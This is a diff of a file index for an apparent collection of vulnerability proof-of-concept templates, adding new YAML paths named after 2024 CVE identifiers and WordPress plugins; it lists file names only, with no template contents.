+./poc/cve/CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7.yaml +./poc/cve/CVE-2024-45270-ff7911032b65570055c615564e945f75.yaml ./poc/cve/CVE-2024-4529-884e2529f1fd12601eb8d52d2b887907.yaml ./poc/cve/CVE-2024-4529.yaml ./poc/cve/CVE-2024-4530-9a40def000de87d4be3ea01c097a6a90.yaml 
@@ -40924,6 +40938,7 @@ ./poc/cve/CVE-2024-4541-a13821acc4717443a1924b4c9fcddcab.yaml ./poc/cve/CVE-2024-4541.yaml ./poc/cve/CVE-2024-4542.yaml +./poc/cve/CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e.yaml ./poc/cve/CVE-2024-4543-471483dd2519c0928697bdeec029b2c5.yaml ./poc/cve/CVE-2024-4543.yaml ./poc/cve/CVE-2024-4544-5e470a25a8681a5bc02ba1f3b19ae5aa.yaml @@ -40939,6 +40954,7 @@ ./poc/cve/CVE-2024-4553.yaml ./poc/cve/CVE-2024-4560-0ea67d02a73eaa7d44010307ee3b0d37.yaml ./poc/cve/CVE-2024-4560.yaml +./poc/cve/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml ./poc/cve/CVE-2024-4564-d97a04c96edf2b3ce77ceef1ea501ee8.yaml ./poc/cve/CVE-2024-4564.yaml ./poc/cve/CVE-2024-4565-b2a339f038f0abdfe1886ac2a73d2760.yaml @@ -41567,6 +41583,8 @@ ./poc/cve/CVE-2024-5554.yaml ./poc/cve/CVE-2024-5555-c92cd8e90a91fbbeb76674d465f92774.yaml ./poc/cve/CVE-2024-5555.yaml +./poc/cve/CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8.yaml +./poc/cve/CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09.yaml ./poc/cve/CVE-2024-5570-5754473cb9c0ff5f3701493b1961b197.yaml ./poc/cve/CVE-2024-5570.yaml ./poc/cve/CVE-2024-5571-747501ea372022d72c5c50040ba89efd.yaml @@ -41619,6 +41637,7 @@ ./poc/cve/CVE-2024-5626.yaml ./poc/cve/CVE-2024-5627-5d69541572ed8fe18605fc3ba5170b27.yaml ./poc/cve/CVE-2024-5627.yaml +./poc/cve/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml ./poc/cve/CVE-2024-5630-914f0b3c2b6c0410d9f770e5e5c6831d.yaml ./poc/cve/CVE-2024-5630.yaml ./poc/cve/CVE-2024-5637-52143d378292b1918b667c9107493dca.yaml @@ -41718,6 +41737,7 @@ ./poc/cve/CVE-2024-5787.yaml ./poc/cve/CVE-2024-5788-28fe2f5078d75f5024e6c25cc111ffd2.yaml ./poc/cve/CVE-2024-5788.yaml +./poc/cve/CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1.yaml ./poc/cve/CVE-2024-5790-e1a1b95d3201b8fb367b3f067a7c83e8.yaml ./poc/cve/CVE-2024-5790.yaml ./poc/cve/CVE-2024-5791-1c1f2db63c5fca19a57edd92322cd84c.yaml 
@@ -41768,8 +41788,11 @@ ./poc/cve/CVE-2024-5863.yaml ./poc/cve/CVE-2024-5864-a14d3fb112fed3b92e729002624bec5e.yaml ./poc/cve/CVE-2024-5864.yaml +./poc/cve/CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea.yaml ./poc/cve/CVE-2024-5868-6851b372736e27b6f14c386eb3b66752.yaml ./poc/cve/CVE-2024-5868.yaml +./poc/cve/CVE-2024-5869-611101c87cbed518f9857873a13fd418.yaml +./poc/cve/CVE-2024-5870-72d352e62d854d49b010539851855ac0.yaml ./poc/cve/CVE-2024-5871-bdd808d6a9eceafe261c336341d9e130.yaml ./poc/cve/CVE-2024-5871.yaml ./poc/cve/CVE-2024-5879-15e47d64ae81bc253ae61d7b9ab17d63.yaml @@ -41782,6 +41805,7 @@ ./poc/cve/CVE-2024-5882.yaml ./poc/cve/CVE-2024-5883-4ea56479d34da8ced01e77d0ad3ee73b.yaml ./poc/cve/CVE-2024-5883.yaml +./poc/cve/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml ./poc/cve/CVE-2024-5889-bec7e2710836223e5ff121d13dac5e19.yaml ./poc/cve/CVE-2024-5889.yaml ./poc/cve/CVE-2024-5892-e23cd3e0ccd8a12c9764022d7c13bd45.yaml @@ -41855,6 +41879,7 @@ ./poc/cve/CVE-2024-6018.yaml ./poc/cve/CVE-2024-6019-ec7b6702246a7d9e677e019d1313f6b0.yaml ./poc/cve/CVE-2024-6019.yaml +./poc/cve/CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe.yaml ./poc/cve/CVE-2024-6021-b2c11ef440f6b0c19e877eb7e43d2618.yaml ./poc/cve/CVE-2024-6021-d63209bf8f0de8a6bee60f11eccbf1bd.yaml ./poc/cve/CVE-2024-6021.yaml @@ -42165,6 +42190,7 @@ ./poc/cve/CVE-2024-6532.yaml ./poc/cve/CVE-2024-6536-644da1db5433ec7e98e563b0b0d6504a.yaml ./poc/cve/CVE-2024-6536.yaml +./poc/cve/CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml ./poc/cve/CVE-2024-6545-8b9c1464db2b925c36397d987977aec8.yaml ./poc/cve/CVE-2024-6545.yaml ./poc/cve/CVE-2024-6546-f23673e1fffccaa3f321e319f1fae99c.yaml 
@@ -42337,6 +42363,7 @@ ./poc/cve/CVE-2024-6767.yaml ./poc/cve/CVE-2024-6770-01c00266a3ecd5089728d5265405f17a.yaml ./poc/cve/CVE-2024-6770.yaml +./poc/cve/CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c.yaml ./poc/cve/CVE-2024-6797-b6db90f6651f67f2c92f688656bcca15.yaml ./poc/cve/CVE-2024-6797.yaml ./poc/cve/CVE-2024-6798-eb9be24d8046a94a2430be02faaec1bd.yaml @@ -42357,6 +42384,7 @@ ./poc/cve/CVE-2024-6836.yaml ./poc/cve/CVE-2024-6843-4c73645cda7e25187e67e72d3f09f636.yaml ./poc/cve/CVE-2024-6843.yaml +./poc/cve/CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml ./poc/cve/CVE-2024-6847-9a165e464b4249dac837d561aa7d8666.yaml ./poc/cve/CVE-2024-6847.yaml ./poc/cve/CVE-2024-6848-3b207bc0d16195d4ae82f368122194b4.yaml @@ -42390,6 +42418,8 @@ ./poc/cve/CVE-2024-6884.yaml ./poc/cve/CVE-2024-6885-cda59c05d6624f0c5bb2fbd29767530a.yaml ./poc/cve/CVE-2024-6885.yaml +./poc/cve/CVE-2024-6888-b452cc3f182752280bb057c3435438a7.yaml +./poc/cve/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml ./poc/cve/CVE-2024-6894-586a0881c5d8ae66a61b156d7983f464.yaml ./poc/cve/CVE-2024-6894-b8cf7cbce2861feb07b407ff4fc7c58d.yaml ./poc/cve/CVE-2024-6894.yaml @@ -42397,6 +42427,7 @@ ./poc/cve/CVE-2024-6896.yaml ./poc/cve/CVE-2024-6897-5f6f0e8f915bf7c9250813dd8889f603.yaml ./poc/cve/CVE-2024-6897.yaml +./poc/cve/CVE-2024-6910-579d75d9cc4716699d11831eae3d5143.yaml ./poc/cve/CVE-2024-6924-57b89cd5c7aee5c3239825f7590be4bb.yaml ./poc/cve/CVE-2024-6924.yaml ./poc/cve/CVE-2024-6925-c9f8459a9480a0976a80921b86688132.yaml @@ -42448,6 +42479,7 @@ ./poc/cve/CVE-2024-7112.yaml ./poc/cve/CVE-2024-7122-332eadd538ee19c7f5056f343ea0b155.yaml ./poc/cve/CVE-2024-7122.yaml +./poc/cve/CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516.yaml ./poc/cve/CVE-2024-7134-68ccbd22e014b574fd8573f2d56f4553.yaml ./poc/cve/CVE-2024-7134.yaml ./poc/cve/CVE-2024-7135-4efde48e672954d3ec911965413e7bde.yaml 
@@ -42491,6 +42523,7 @@ ./poc/cve/CVE-2024-7351.yaml ./poc/cve/CVE-2024-7353-51d3774cc31ba9c09e3ef4a4a7c21d55.yaml ./poc/cve/CVE-2024-7353.yaml +./poc/cve/CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml ./poc/cve/CVE-2024-7355-464a77ba558154888cf73a5cab0a6cc4.yaml ./poc/cve/CVE-2024-7355.yaml ./poc/cve/CVE-2024-7356-e407b53caac26f66b43c955c6cf7ef5c.yaml @@ -42529,6 +42562,7 @@ ./poc/cve/CVE-2024-7420.yaml ./poc/cve/CVE-2024-7422-687a511b4014fc6e48564ef68ecc160f.yaml ./poc/cve/CVE-2024-7422.yaml +./poc/cve/CVE-2024-7423-beef10a23166777228f21f82780dd30d.yaml ./poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml ./poc/cve/CVE-2024-7435.yaml ./poc/cve/CVE-2024-7447-616934177af234fd0293527159d2650e.yaml @@ -42627,6 +42661,7 @@ ./poc/cve/CVE-2024-7702.yaml ./poc/cve/CVE-2024-7703-7d232ae776193850ef9d74eec7d98698.yaml ./poc/cve/CVE-2024-7703.yaml +./poc/cve/CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa.yaml ./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml ./poc/cve/CVE-2024-7717.yaml ./poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml @@ -42645,6 +42680,7 @@ ./poc/cve/CVE-2024-7780.yaml ./poc/cve/CVE-2024-7782-33cd7b02fe64ca6292df042c7ea86c84.yaml ./poc/cve/CVE-2024-7782.yaml +./poc/cve/CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed.yaml ./poc/cve/CVE-2024-7791-1535a2c9bf91c5d74bf51cb32be9b8f4.yaml ./poc/cve/CVE-2024-7791.yaml ./poc/cve/CVE-2024-7816-51e92a8e0f7a061869b80a8bec127c9d.yaml 
@@ -42684,16 +42720,20 @@ ./poc/cve/CVE-2024-7870-4b3910b5527f496007ddf9a3918025ed.yaml ./poc/cve/CVE-2024-7870-8f97f143492468182d67786194a0ead7.yaml ./poc/cve/CVE-2024-7870.yaml +./poc/cve/CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b.yaml +./poc/cve/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml ./poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml ./poc/cve/CVE-2024-7895.yaml ./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml ./poc/cve/CVE-2024-7918.yaml ./poc/cve/CVE-2024-7950-4a4c660d480c32376f512832d16b17e2.yaml ./poc/cve/CVE-2024-7950.yaml +./poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml ./poc/cve/CVE-2024-8016-d1bc0d8335eb95e44886878c9717595b.yaml ./poc/cve/CVE-2024-8016.yaml ./poc/cve/CVE-2024-8030-4bf23408e0dc80a213e018f362e5999c.yaml ./poc/cve/CVE-2024-8030.yaml +./poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml ./poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml ./poc/cve/CVE-2024-8043.yaml ./poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml @@ -42742,6 +42782,7 @@ ./poc/cve/CVE-2024-8200.yaml ./poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml ./poc/cve/CVE-2024-8241.yaml +./poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml ./poc/cve/CVE-2024-8247-7ddc0c06e971c1cf25a0f3f37508e6b0.yaml ./poc/cve/CVE-2024-8247.yaml ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml @@ -42750,6 +42791,7 @@ ./poc/cve/CVE-2024-8253.yaml ./poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml ./poc/cve/CVE-2024-8268.yaml +./poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml ./poc/cve/CVE-2024-8274.yaml ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml 
@@ -42790,6 +42832,18 @@
 ./poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml
 ./poc/cve/CVE-2024-8543.yaml
 ./poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml
+./poc/cve/CVE-2024-8656-1116395151f79029236816f9e11f544d.yaml
+./poc/cve/CVE-2024-8663-483f5812b103f5a68eb659c586f798b2.yaml
+./poc/cve/CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835.yaml
+./poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml
+./poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml
+./poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml
+./poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml
+./poc/cve/CVE-2024-8732-f30eab986c0f8516da683155679193fc.yaml
+./poc/cve/CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc.yaml
+./poc/cve/CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml
+./poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml
+./poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml
 ./poc/cve/CVE_2023_49442.yaml
 ./poc/cve/CVE_2023_51467.yaml
 ./poc/cve/CVE_2024_0195.yaml
@@ -45106,6 +45160,7 @@
 ./poc/cve/cve-2017-7269-3054.yaml
 ./poc/cve/cve-2017-7269-3055.yaml
 ./poc/cve/cve-2017-7269-3056.yaml
+./poc/cve/cve-2017-7269.yaml
 ./poc/cve/cve-2017-7391-3057.yaml
 ./poc/cve/cve-2017-7391-3058.yaml
 ./poc/cve/cve-2017-7391-3059.yaml
@@ -45239,6 +45294,7 @@
 ./poc/cve/cve-2018-1000600-3146.yaml
 ./poc/cve/cve-2018-1000600-3147.yaml
 ./poc/cve/cve-2018-1000671-3148.yaml
+./poc/cve/cve-2018-1000671.yaml
 ./poc/cve/cve-2018-1000856.yaml
 ./poc/cve/cve-2018-1000861-3149.yaml
 ./poc/cve/cve-2018-1000861-3150.yaml
@@ -46330,6 +46386,7 @@
 ./poc/cve/cve-2019-17503-3985.yaml
 ./poc/cve/cve-2019-17503-3986.yaml
 ./poc/cve/cve-2019-17503-3987.yaml
+./poc/cve/cve-2019-17503.yaml
 ./poc/cve/cve-2019-17506-3988.yaml
 ./poc/cve/cve-2019-17506-3989.yaml
 ./poc/cve/cve-2019-17506-3990.yaml
@@ -46559,6 +46616,7 @@
 ./poc/cve/cve-2019-5127-4162.yaml
 ./poc/cve/cve-2019-5127-4163.yaml
 ./poc/cve/cve-2019-5127-4164.yaml
+./poc/cve/cve-2019-5127.yaml
 ./poc/cve/cve-2019-5418-2(1).yaml
 ./poc/cve/cve-2019-5418-4165.yaml
 ./poc/cve/cve-2019-5418-4166.yaml
@@ -46591,6 +46649,7 @@
 ./poc/cve/cve-2019-6715-4189.yaml
 ./poc/cve/cve-2019-6715-4190.yaml
 ./poc/cve/cve-2019-6715-4191.yaml
+./poc/cve/cve-2019-6715.yaml
 ./poc/cve/cve-2019-7192-4192.yaml
 ./poc/cve/cve-2019-7192-4193.yaml
 ./poc/cve/cve-2019-7192-4194.yaml
@@ -60229,8 +60288,10 @@
 ./poc/microsoft/mstore-api-1c2cd9ed5c2d1dcf576fe7aecb5ca226.yaml
 ./poc/microsoft/mstore-api-319cdcd8aefa6dfb47435662ea3be489.yaml
 ./poc/microsoft/mstore-api-3678a5cbd624bf906b9f1499b42e328d.yaml
+./poc/microsoft/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml
 ./poc/microsoft/mstore-api-3bbe1e9b2827123550346928e2f78aea.yaml
 ./poc/microsoft/mstore-api-47e384bbd4951ebb4d217ea16a357447.yaml
+./poc/microsoft/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml
 ./poc/microsoft/mstore-api-6455a4c18e211ec9c979086a333e3980.yaml
 ./poc/microsoft/mstore-api-6a7c29035944a1901b23ef2195208fe3.yaml
 ./poc/microsoft/mstore-api-79265025e2ae87c5e5adf65c0d03eeec.yaml
@@ -60380,6 +60441,7 @@
 ./poc/microsoft/ninja-forms-ccabcbbf6275bf0bb08ae99921344965.yaml
 ./poc/microsoft/ninja-forms-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/microsoft/ninja-forms-db5cbbe2e62074df44cb5125a2b60b42.yaml
+./poc/microsoft/ninja-forms-dbba8836e7c63cb37d729f0bede3c08c.yaml
 ./poc/microsoft/ninja-forms-e43b3523df958527a8d4bbc970bc4aaf.yaml
 ./poc/microsoft/ninja-forms-e535687ce846105164059b938c1671b0.yaml
 ./poc/microsoft/ninja-forms-e61176c5d6fde32c74d54ba073739aa1.yaml
@@ -60619,6 +60681,7 @@
 ./poc/microsoft/sensei-lms-1111cefe24de1ace303deec63cfb9a0e.yaml
 ./poc/microsoft/sensei-lms-85a373e82ccc10a34f197c7718aea84b.yaml
 ./poc/microsoft/sensei-lms-c63bf77b4673b1516933ee9dbc12c7ea.yaml
+./poc/microsoft/sensei-lms-ef4f55a1a9193b0f96c64942d4d06097.yaml
 ./poc/microsoft/sensei-lms.yaml
 ./poc/microsoft/sevone-nms-network-manager.yaml
 ./poc/microsoft/sfwd-lms-06323fb9edeca49ba23c68725457bd17.yaml
@@ -65659,6 +65722,7 @@
 ./poc/other/beaf-before-and-after-gallery.yaml
 ./poc/other/beanstalk-service.yaml
 ./poc/other/beast2.yaml
+./poc/other/beauty-af9641ba5dc553a449654ef14a59f791.yaml
 ./poc/other/beauty-premium-5daae5daa6880f8a3ebf5f7b2a3f1a04.yaml
 ./poc/other/beauty-premium.yaml
 ./poc/other/beaver-builder-lite-version-025479fadd320f008366a6f2fd3c779a.yaml
@@ -67414,6 +67478,7 @@
 ./poc/other/carousel-ck-231c945bfa4ce8c56aadc3cf4c088d96.yaml
 ./poc/other/carousel-ck.yaml
 ./poc/other/carousel-slider-0d0eba60355dc02eab84d13e361d466d.yaml
+./poc/other/carousel-slider-47bcd81d4514b99552c241ecb59905d9.yaml
 ./poc/other/carousel-slider-b8f8948314afe2dfa152d53175e6a8e3.yaml
 ./poc/other/carousel-slider-dd564aa389005739b56732e0a38ffccf.yaml
 ./poc/other/carousel-slider.yaml
@@ -68083,6 +68148,7 @@
 ./poc/other/classified-listing-224bb0277be96a151ca18daad36f2201.yaml
 ./poc/other/classified-listing-26cf8661550461b31f82955b1b21424a.yaml
 ./poc/other/classified-listing-96030500fe2554ea1cda13e31e7a5e40.yaml
+./poc/other/classified-listing-ecc300d4a146eb5fa016a0c1753ad120.yaml
 ./poc/other/classified-listing-pro-2ba88182a44e9f497cd203cf952a1543.yaml
 ./poc/other/classified-listing-pro-96030500fe2554ea1cda13e31e7a5e40.yaml
 ./poc/other/classified-listing-pro.yaml
@@ -68387,6 +68453,7 @@
 ./poc/other/coblocks-951570b82856782d2bde0ef2d8953b85.yaml
 ./poc/other/coblocks-9d1c59fe83ca4e28dd3af29d8e77c052.yaml
 ./poc/other/coblocks-b8013a51f907a9f98cbb4eaf698b4488.yaml
+./poc/other/coblocks-d1afbe7fe0adeb3b4e8c4851395b42e6.yaml
 ./poc/other/coblocks.yaml
 ./poc/other/cobubrazor_v8-Controller_fixt-info.yaml
 ./poc/other/cobubrazor_v8-Controller_fixt2-info.yaml
@@ -69963,6 +70030,7 @@
 ./poc/other/custom-permalinks-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/custom-permalinks-plugin.yaml
 ./poc/other/custom-permalinks.yaml
+./poc/other/custom-post-limits-3783595ba4ef5e542f7f4b09997c59ec.yaml
 ./poc/other/custom-post-type-cpt-cusom-taxonomy-ct-manager-545458b7b7b2233a436d11a150e94027.yaml
 ./poc/other/custom-post-type-cpt-cusom-taxonomy-ct-manager.yaml
 ./poc/other/custom-post-type-generator-62b47aaf51a6b97163e1f37ffe1ee69d.yaml
@@ -70343,6 +70411,7 @@
 ./poc/other/delete-usermetas.yaml
 ./poc/other/delhivery-logistics-courier-e540fdefb7cb34683c3c4a72e8a9c3bc.yaml
 ./poc/other/delhivery-logistics-courier.yaml
+./poc/other/delicate-be1dd882c5127ca050d4475dd55704a0.yaml
 ./poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml
 ./poc/other/delicious-recipes-ac6497f90b87539235fa65f903a4be42.yaml
 ./poc/other/delicious-recipes-b301e06b5394f13942c93a763ac7eb0e.yaml
@@ -72138,6 +72207,7 @@
 ./poc/other/email-newsletter-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/email-newsletter-plugin.yaml
 ./poc/other/email-newsletter.yaml
+./poc/other/email-obfuscate-shortcode-be43cfd9d399fba1f8b44a6dac9327bb.yaml
 ./poc/other/email-posts-to-subscribers-bf2dac30125abd49dd9e0cd3b59ec33a.yaml
 ./poc/other/email-posts-to-subscribers-c8830a6cc3d68798ee1b5be70125e31e.yaml
 ./poc/other/email-posts-to-subscribers-f4b7849ec123d8892e647b6eb213be42.yaml
@@ -72408,6 +72478,7 @@
 ./poc/other/envira-gallery-lite-32368ae6a5469d45a7caf21e1380210d.yaml
 ./poc/other/envira-gallery-lite-8f0b64d9ba8fa97daf748f6b0a650153.yaml
 ./poc/other/envira-gallery-lite-ab612d61b55e5b2365104e73d3c0d7f9.yaml
+./poc/other/envira-gallery-lite-bb5f23aa595372d8f56de7733b43289d.yaml
 ./poc/other/envira-gallery-lite-be6858d18e3b44c07ee6d02d08a75f44.yaml
 ./poc/other/envira-gallery-lite-e1a4fd441df05fc0e1b240bff24d1f48.yaml
 ./poc/other/envira-gallery-lite.yaml
@@ -72578,6 +72649,7 @@
 ./poc/other/essential-addons-elementor.yaml
 ./poc/other/essential-addons-for-elementor-lite-02194837ac03e660b13781ad83519599.yaml
 ./poc/other/essential-addons-for-elementor-lite-0314fd1ade04941b996bce69b979c4d2.yaml
+./poc/other/essential-addons-for-elementor-lite-07659033abd50bc07bbb85d0c2c40ea8.yaml
 ./poc/other/essential-addons-for-elementor-lite-0d7d62c4c3a349a9125a1a2ef0f21f1e.yaml
 ./poc/other/essential-addons-for-elementor-lite-0eb4196c7399d1fe345df607ec0b5c1e.yaml
 ./poc/other/essential-addons-for-elementor-lite-197abae64baa9b6686127186f973525d.yaml
@@ -72849,6 +72921,7 @@
 ./poc/other/eventon-lite-250a778446871096fed9464ea542aa26.yaml
 ./poc/other/eventon-lite-5e15933f85c1ae0850fd7129fff3c095.yaml
 ./poc/other/eventon-lite-5ea7a8b49a8694cb7de5936b13beb211.yaml
+./poc/other/eventon-lite-66feb39b6f192a89af6b7a7c392fc4f9.yaml
 ./poc/other/eventon-lite-76c6d55012bba447c24dac5e16bf0305.yaml
 ./poc/other/eventon-lite-784b3ad66752676549870272c0296b7f.yaml
 ./poc/other/eventon-lite-7d6f61ad995d28761e20471a4a33f4fd.yaml
@@ -73946,6 +74019,7 @@
 ./poc/other/floating-cart-xforwc-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/floating-cart-xforwc-e7d05b0a2c85ee1ade7bf5ca69c912bf.yaml
 ./poc/other/floating-cart-xforwc.yaml
+./poc/other/floating-contact-628f849b35a63914cc2a2dfc18459221.yaml
 ./poc/other/floating-div-114bd9351dc168ff2f1bb8e40e437331.yaml
 ./poc/other/floating-div.yaml
 ./poc/other/floating-links-557dfeac01daa0367c681069c19d386e.yaml
@@ -74335,6 +74409,7 @@
 ./poc/other/formilla-live-chat-ce5a04e92c3bd1ea43e0e9b4093c5ca8.yaml
 ./poc/other/formilla-live-chat.yaml
 ./poc/other/forminator-0461683514363461c1699d88e0c2e9c6.yaml
+./poc/other/forminator-1007572ad74a1525d3e599dfc0947e74.yaml
 ./poc/other/forminator-15217c33a82fd082c72467274eb68e92.yaml
 ./poc/other/forminator-2e20c35e4b7d5d40abb874e2befef419.yaml
 ./poc/other/forminator-3157536d48ecbbd188fe8656ce16162c.yaml
@@ -78663,6 +78738,7 @@
 ./poc/other/legal-pages-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/legal-pages-plugin.yaml
 ./poc/other/legal-pages.yaml
+./poc/other/leira-cron-jobs-fe4abc94d1b3a54df636c66ccc18fe03.yaml
 ./poc/other/lemis-management-system.yaml
 ./poc/other/lenovo-enterprise-network-disk.yaml
 ./poc/other/lenovo-fp-panel.yaml
@@ -79107,6 +79183,7 @@
 ./poc/other/loyaa-information-automatic-editing-system.yaml
 ./poc/other/loytec-device.yaml
 ./poc/other/lpse.yaml
+./poc/other/lucas-string-replace-91f4d8bbc24ad8bb807fb53be34c26ec.yaml
 ./poc/other/lucee-stack-trace-8666.yaml
 ./poc/other/lucee-stack-trace-8667.yaml
 ./poc/other/lucee-stack-trace-8668.yaml
@@ -81280,6 +81357,7 @@
 ./poc/other/nd-travel-4047b81ad624f9afe5b44c28c107b154.yaml
 ./poc/other/nd-travel-56a474e3276fcf1cfa3baee5b5204775.yaml
 ./poc/other/nd-travel.yaml
+./poc/other/neighborly-2046cef31a20a206df02f665f01316a1.yaml
 ./poc/other/nelio-ab-testing-2f99f40186bbf33979977c797ec514b1.yaml
 ./poc/other/nelio-ab-testing-d72b5e601d56aaa2024c459354858a51.yaml
 ./poc/other/nelio-ab-testing-df8112ed611d215c20a5de6ca56c6f84.yaml
@@ -82773,6 +82851,7 @@
 ./poc/other/parallelus-unite-theme-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/parallelus-unite-theme.yaml
 ./poc/other/parallelus-unite.yaml
+./poc/other/parametros-preguicosos.yaml
 ./poc/other/paramount-7b5dc6f87494e206bcd91679f9317348.yaml
 ./poc/other/paramount-a7135c0ddcac242413a56646b0ca4214.yaml
 ./poc/other/paramount-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -82939,6 +83018,7 @@
 ./poc/other/pdf-print-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/pdf-print-plugin.yaml
 ./poc/other/pdf-print.yaml
+./poc/other/pdf-thumbnail-generator-501ab9fae6b71897e59ae34630113849.yaml
 ./poc/other/pdf-viewer-46a71b75013fa6a26ef2e9d2adc4ee07.yaml
 ./poc/other/pdf-viewer-block-f7380c7284411dca05a64069ce992d09.yaml
 ./poc/other/pdf-viewer-block.yaml
@@ -83706,6 +83786,7 @@
 ./poc/other/popup-maker-4eb10f58a2fde77d0f3d8517c551ce80.yaml
 ./poc/other/popup-maker-5af732f2d686543e8d937541b1d186e9.yaml
 ./poc/other/popup-maker-5ba7c4bb3b9a8cc4e2165774ddf9b3fa.yaml
+./poc/other/popup-maker-699c5ccba8a85c1a969fe9ae0872dda6.yaml
 ./poc/other/popup-maker-73e6cd4118b9b5b79858a70f6be2cbed.yaml
 ./poc/other/popup-maker-8413514d726af0a2f1e4862b23e92661.yaml
 ./poc/other/popup-maker-9f279daa55ef5c0bf1b747b0faef3010.yaml
@@ -86639,12 +86720,15 @@
 ./poc/other/secupress.yaml
 ./poc/other/secure-admin-ip-b91323638af6807429ad9a8aa0924c83.yaml
 ./poc/other/secure-admin-ip.yaml
+./poc/other/secure-copy-content-protection-5e0d9df78ac9d4442faef8b580ff6a03.yaml
 ./poc/other/secure-copy-content-protection-66c2c3ecab78dce633527d7784f556f9.yaml
 ./poc/other/secure-copy-content-protection-82b7f92c06e7e9099ea22e51aa3d1188.yaml
 ./poc/other/secure-copy-content-protection-9a9c5b72ff8e99b948899a54568729cd.yaml
 ./poc/other/secure-copy-content-protection-9f2393c84bd49d42fd02e60d3055b6a9.yaml
+./poc/other/secure-copy-content-protection-a6226aec94d543dc2c23085879e76e28.yaml
 ./poc/other/secure-copy-content-protection.yaml
 ./poc/other/secure-donation.yaml
+./poc/other/secure-downloads-5b228709f387f8ae0d1b397d9bc429ac.yaml
 ./poc/other/secure-file-manager-f246e7800bff92325c50ae85d0881b35.yaml
 ./poc/other/secure-file-manager.yaml
 ./poc/other/secure-files-28986e1f925cf1e7b07c6e99ce5d59a2.yaml
@@ -88891,6 +88975,7 @@
 ./poc/other/standout-color-boxes-and-buttons.yaml
 ./poc/other/star-network-utility.yaml
 ./poc/other/staragent.yaml
+./poc/other/starbox-0b40d1ee6028266a39beb0c58d6d2b92.yaml
 ./poc/other/starbox-3bf106034d2c314e890eaa51b23b851a.yaml
 ./poc/other/starbox-427b6a88ed89093333ad7d781f4928cd.yaml
 ./poc/other/starbox-7cbf0dfe8f3623c38a458013e347974f.yaml
@@ -89108,6 +89193,7 @@
 ./poc/other/streak-crm-for-gmail-integration-for-contact-form-7-plugin.yaml
 ./poc/other/streak-crm-for-gmail-integration-for-contact-form-7.yaml
 ./poc/other/stream-2c4492c84148255161cc6cd91925c853.yaml
+./poc/other/stream-42c36199990b21951ee1ae2816559fc3.yaml
 ./poc/other/stream-76d4bb676580c6a749ba1a66f811d318.yaml
 ./poc/other/stream-96be7602a4bbac6ec810aaa4af6e7ff7.yaml
 ./poc/other/stream-affff7160b48377fafd9ea459452eb0b.yaml
@@ -90964,6 +91050,7 @@
 ./poc/other/twchat-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/twchat-plugin.yaml
 ./poc/other/twchat.yaml
+./poc/other/tweaker5-7499f94acf789ea7420fecd8147fd86f.yaml
